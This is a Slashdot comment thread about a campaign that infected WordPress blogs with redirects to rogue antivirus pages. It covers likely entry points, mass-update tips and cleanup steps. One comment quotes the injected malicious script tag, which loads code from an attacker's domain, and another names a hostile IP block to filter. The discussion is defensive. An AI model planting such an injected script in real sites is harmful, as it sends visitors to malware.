30K WordPress Blogs Infected With the Latest Malware Scam

alphadogg writes with an excerpt from an article over at Network World: "Almost 30,000 WordPress blogs have been infected in a new wave of attacks orchestrated by a cybercriminal gang whose primary goal is to distribute rogue antivirus software, researchers from security firm Websense say. The attacks have resulted in over 200,000 infected pages that redirect users to websites displaying fake antivirus scans. The latest compromises are part of a rogue antivirus distribution campaign that has been going on for months, the Websense researchers said."

McAfee?

[Oswald McWeany]

websites displaying fake antivirus scans

I didn't know McAfee had started targeting Web blogs now.

Re:McAfee?

[tepples]

It might be hard to believe, but there are antivirus companies even less scrupulous than McAfee and Norton. Wikipedia explains [wikipedia.org].

Re:

[Ihmhi]

Selectively disabling parts of the system to prevent the user from uninstalling the malware. Some may also prevent anti-malware programs from running, disable automatic system software updates and block access to websites of anti-malware vendors.

I dunno, sounds like Norton to me.

Norton tries to provide a working uninstaller

[tepples]

At least Norton tries to provide a working removal tool [symantec.com] at no charge. The only problem I've found is that it's made deliberately inaccessible to blind users (with a CAPTCHA) so that malware doesn't automatically run it on every computer that it tries to infect.

Re:

[account_deleted]

Comment removed based on user account deletion

Re:

[X0563511]

What a useful comment!

Re:

[ciderbrew]

pot, meet kettle.

Analysis

[SirDice]

Why do they always focus on the crap that's left behind when they analyses these things? I want to know how they managed to get that stuff on those servers so I can check my own. Was is an old and vulnerable WordPress or was it some 0-day they used? For some reason they always focus on the effects and not on the causes.

Re:Analysis

[WankersRevenge]

From the fine article:

Many of the blogs compromised in these recent attacks were running outdated WordPress versions, had vulnerable plug-ins installed or had weak administrative passwords susceptible to brute force attacks, said David Dede, a security researcher with website integrity monitoring firm Sucuri Security. "It seems the attackers are trying everything lately."

Re:

[SirDice]

Ah, that helps. I only read the WebSense analysis hoping to read some details there. Apart from mentioning WordPress there isn't much in there how they actually got in.

Re:Analysis

[drobety]

For what it's worth, looking at the recent 404 errors on my site, I've notice many (failed fortunately) requests related to Ajax File And Image Manager 1.0 Final Code Execution [packetstormsecurity.org]

wordpress, again?

[v1]

Is it just a popularity/contrast thing, or does wordpress seem to be popping up a lot recently for security holes in their web servers?

Re:

[Spad]

At a guess, the ratio of Installs to Unpatched/Insecure Installs, both of the core WP software and its many, many 3rd party plugins and themes.

A *lot* of sites are either running old versions of software or have plugins/themes with gaping vulnerabilities that are no longer under active development.

Re:wordpress, again?

[gmack]

Some of that is Wordpress' fault for not having an easy way to run mass upgrades. My employer has 15 different sites running on Wordpress and the fact that I have to log in to each one manually after upgrading the files and click a link to handle the database update is annoying.

Re:

[Anonymous Coward]

Set up WP MultiSite, update one site and one set of plugins and be done with it - easy as that...

Re:

[X0563511]

That has anything to do with Wordpress?

Doesn't even make sense. Windows has automatic updating, something Linux distros are just starting to do (notifying has been around for a while, but automatically acting is "new")

Re:

[turbidostato]

"notifying has been around for a while, but automatically acting is "new""

Do you really consider something that has been available, well, forever as new? (I'll just mention cron-apt as an example).

Re:

[X0563511]

It is neither installed or mentioned during a standard system installation. That's the difference.

Re:

[turbidostato]

"It is neither installed or mentioned during a standard system installation. That's the difference."

Neither is Apache therefore web servers are the new thing, is that your point?

Of course not. I know what your point is: that no *true* Scotsman...

Re:

[X0563511]

What?

What does apache have to do with it? The idiot was talking about OS auto updating, which I pointed out had nothing to do with anything.

I then went on to say that even if it DID have anything to do with it, he was wrong anyway.

Re:

[X0563511]

Er, no. Try again. Preferably with more reading comprehension.

Re:

[X0563511]

That's funny, that's all I'm hearing from YOU, the AC.

Re:

[ArsenneLupin]

Or failing to find a specific solution for Wordpress: Use perl's WWW::Mechanize to click that DB upgrade link (and any other GUI-only things) for you.

Re:wordpress, again?

[nick.sideras]

Some of that is Wordpress' fault for not having an easy way to run mass upgrades. My employer has 15 different sites running on Wordpress and the fact that I have to log in to each one manually after upgrading the files and click a link to handle the database update is annoying.

This drove me nuts at my current job for about 2 months - you need Wordpress Network [wordpress.org].

There's the easy way and the hard(er) way to do this:

This [wordpress.org] is the official easy way, but it's never worked for me (last tried in Spring of 2011). The nice thing is that it's all stuff built into WordPress, so you should be able to do it without any problems. I'd say it's probably worth giving this a try with one site, and if it works, run with it.

This [bavatuesdays.com] is more down and dirty way that will definitely work, and is more or less how I did it. A little SQL editing never hurt anyone.
Also, this [sillybean.net] is a great companion to the bavatuesdays link. He goes on about his DNS in the first few paragraphs, but the second half of that post has some good details about where files need to be, and how links and such need to be updated.

Once you have a network, you a fantastic "Update Network [wordpress.org]" button. Boom. Take the rest of the day off.

Re:

[gmack]

Awesome, thanks for the heads up.

Re:

[aussiedood]

Agreed! At least you only have 15, I've just been given the task of managing our Wordpress implementation, we're at 144. *Ugh*

Re:

[Anonymus]

WordPress is extremely easy and quick to update. You can click a single button and update every single plugin and theme, or another button to update core. That's it. If you're upgrading by manually uploading files to a bunch of different servers for some reason, you should at least look into something like updating with Subversion [wordpress.org] or using multisite and just updating once for every site.

Re:

[Hatta]

You can't automatically log into a website and click a link with a very small shell script?

Re:

[element-o.p.]

Seriously? It's a hassle to have to log into each server and click a link?

You must never have run Gentoo*...

*Which is still my favorite distro, despite occasionally being a real PITA to update.

Re:

[gmack]

I used to love hand compiling everything but then I got my first full time sysadmin job. The job came with 20 servers and thankfully 15 of them ran Debian. When you have to do something repeatedly it gets old quickly so now I want the OS to do as much as possible and script most of the rest.

Re:

[element-o.p.]

LOL. I've been a full time sys admin for ten years -- first with Solaris and FreeBSD servers, then in my current job with about 15 or so Gentoo (!) servers plus my laptop and a desktop. We migrated to Ubuntu about three years ago. In all honesty, we do a much better job of updating the Ubuntu servers than we did the Gentoo servers because it is so much easier to do, but I am starting to loathe my Ubuntu laptop. It's a lot easier to get wireless working in Ubuntu than Gentoo, but Unity, nVidia drivers*,

Re:

[gmack]

I gave up on the new Ubuntu pretty quickly while installing a friend's notebook last month and ended up installing debian + xfce + wicd. No complaints from him at all.

For servers, it's hard to beat debian + dotdeb repo.

Re:

[mattrad]

Well my clicking-averse friend, you need managewp.com. One login and a click or two, and you've updated all those 15 installs. Either that or migrate everything to multisite (Backup Buddy is great for that).

Re:

[Pf0tzenpfritz]

You mean "the fact that I have missed to write some working update/deployment script is annoying"? Come on - it's not that hard. Just rsync anything but wp-content. Make sure they all have the same plugins installed but not necessarily activated and sync the plugins folder, too. That's for starters. The elegant way involves delivering images and "uploads" from a CDN and simply unpacking the new versions over the old ones by rsync, ftp or wget...

Re:

[Anonymus]

I personally think it's mostly a popularity thing, since WordPress pretty much owns the blog market. I think the other problem, however, is just with how simple they've made it to accidentally backdoor your site. There are thousands of plugins for WordPress, installable with just a couple of clicks, written by people who know nothing about security, or have possibly even maliciously left holes in their plugin. Unlike large projects that are generally maintained and reviewed by dozens of people, a plugin

Method of infection

[dgharmon]

"The Websense ThreatSeeker Network has detected a new wave of mass-injections [websense.com] of a well-known rogue antivirus campaign"

How exactly are these sites infected in the first place?

"The page looks like a Windows Explorer [websense.com] window with a "Windows Security Alert" dialogue box in it"

Ahh so - nothing to read here ... moving on ...

Re:

[Pope]

I used to get those all the time on my Mac and just laugh. Then they made a special OS X-looking one.

Re:

[Rick17JJ]

A number of years ago, I encountered a fake Microsoft security warning while using my Linux computer. It said that Microsoft had detected viruses and spyware on my computer. This was on a Linux computer that did not have any Microsoft products installed on it.

It offered to do a free online scan of my hard drive. Despite clicking on No, a progress bar appeared as it started to do a fake scan of my hard drive. After about 60 seconds, it said that it had finished scanning my drive C. It then said that several

Re:

[klui]

So looks like the injected code
</DIV> <!-- END body-wrapper -->
<script src="http://ionis90landsi.rr.ru/mm.php?=1"></script>
</BODY>
</HTML>
would be take care of with NoScript as long as your white list is short and doesn't contain rr.nu in this example.

Specialist ISP of Transnistria.. again.

[Dynamoo]

It looks like the first step in the infection is via an IP (194.28.114.103) belonging to Specialist ISP of Transnistria [wikipedia.org]. That has featured before on Slashdot in this story [slashdot.org].

The block 194.28.112.0/22 is simply all evil (I've documented it here [dynamoo.com] in the past), there's no reason to send traffic to it at all, blocking it is a good option.

Re:

[gaspyy]

Transnistria is basically a haven for organized crime. A "republic" with virtually no international recognition, a very small economy and ties with international arm dealers.

Re:

[Dynamoo]

Exactly. It's a country that doesn't exist in the eyes of most other countries, which makes it beyond the reach of international law enforcement. There are other countries in the world like that, the difference with Transnistria is that it has a somewhat modern infrastructure.

Why bother with an infector?

[Opportunist]

Why bother using 0day exploits and payload droppers when the best infector is sitting right in front of the PC?

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:

[Opportunist]

About time politicians discover the net as something useful!

Re:Its 2012 and yet still...

[X0563511]

Are you an idiot? The article is talking about WORDPRESS - a web application! Windows isn't involved!

Re:

[Spy Handler]

he's probably just auto-posting anti-MS fud and pro-Android/Google to build karma. Watch his comment become insightful soon.

Re:

[NotBorg]

You're right no one would ever want to involve Windows with their Wordpress install. The year of Windows on the server will never come.

So where does the malware get downloaded to idiot?

[Viol8]

Wordpress is the vector.

Fscking moron.

Re:

[X0563511]

So? The article is talking about the vector, not the payload.

Fscking moron.

Continued Password Problem

[Neutral_Observer]

Anyone else continuing to have a problem when you type your password that it shows instead of ******? My password is ilikegirrlz See, it did it again!

Re:

[Anonymous Coward]

Hunter2
 
Now get off my lawn!

For Newbs: Steps to Fix

[dgrotto]

Most of my WP installs were infected because I am a slack ass. Here are the high level steps I took to solve the problem:

• 1) Backup sites.
• 2) Fix all world-writable directories in your WP install (what the hell WP?!). This seems to be the primary vector for getting in.
• 3) Clean up infected PHP files with this script from php-beginners.com [php-beginners.com]. Thank you Paolo.
• 4) Inspect all .htaccess configs for errant redirects and fix.
• 5) Install and run the timthumb vulnerability scanner [wordpress.org]. Possible secondary vector. Thank you Peter Butler!
• 6) Update your WP install to latest and greatest.
• 7) Remove any unused plugins and themes.
• 8) Backup sites.

I may be missing something - again, I'm a slackass. Anyone else have other advice for our admin-challenged friends besides "get a real software package"?

By the way, I was trying to lock down one of my WP installs to only allow authed users access to posts. However, WP does not put the assets for post - usually in wp-content/uploads - behind the auth wall. It's just out there for the whole world to see. It was a simple fix to rewrite the .htaccess config for this directory to redirect to an auth script, but still it still shocks me how insecure this app is.

Re:

[dgrotto]

Forgot one thing:

The hack puts a list of sites to redirect to in a .logs directory. rm these.

Related drive-by malware

[ThatsNotPudding]

BTW: why is Adobe allowed to - by default - check the box on their flash updates to also install Norton on the victims computer? How many trusting civilians (think: grandmothers) end up with borked computers with conflicting AV programs solely due to corporate greed? I'm willing to bet this check box (if it even appears) is NOT checked by default in the EU market. Man, I miss government FOR the people...

Re:

[LunaticTippy]

Norton is malware in my opinion. I wish all the antivirus software would block it.

and I was looking for a blog site

[Skapare]

And I was looking for a blog hoster this week, and specifically at WordPress. Anyone got a list of free blog hosters (moving away from blogspot)?

Which versions?

[sigaar]

Any idea which versions of Wordpress is being targeted and/or which vulnerability? The quoted articles look more like commercials for Websense.